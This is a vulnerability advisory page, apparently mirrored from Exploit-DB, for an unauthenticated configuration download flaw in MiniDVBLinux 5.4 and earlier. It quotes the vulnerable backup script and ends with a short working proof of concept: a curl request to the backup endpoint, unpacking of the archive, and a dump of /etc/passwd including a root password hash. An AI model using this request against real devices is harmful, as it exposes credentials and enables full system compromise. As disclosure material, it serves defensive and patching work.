MiniDVBLinux <=5.4 Config Download Exploit

vendor:

MiniDVBLinux

by:

LiquidWorm

7.5

CVSS

HIGH

Unauthenticated Configuration Download

200

CWE

Product Name: MiniDVBLinux

Affected Version From: <=5.4

Affected Version To: <=5.4

Patch Exists: NO

Related CWE:

CPE: MiniDVBLinux

Metasploit:

Other Scripts:

Platforms Tested: Linux

2020

MiniDVBLinux <=5.4 Config Download Exploit

The application is vulnerable to unauthenticated configuration download when direct object reference is made to the backup function using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.

Mitigation:

Ensure that the application is not vulnerable to unauthenticated configuration download.

Source

Exploit-DB raw data:

# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.

====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03:     . /etc/rc.config
04:     header "Content-Type: application/x-compressed-tar"
05:     header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06:     /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07:     cat /tmp/backup_config_$$.tgz
08:     rm -rf /tmp/backup_config*
09:     exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>

====================================================================

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php


24.09.2022

--


> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>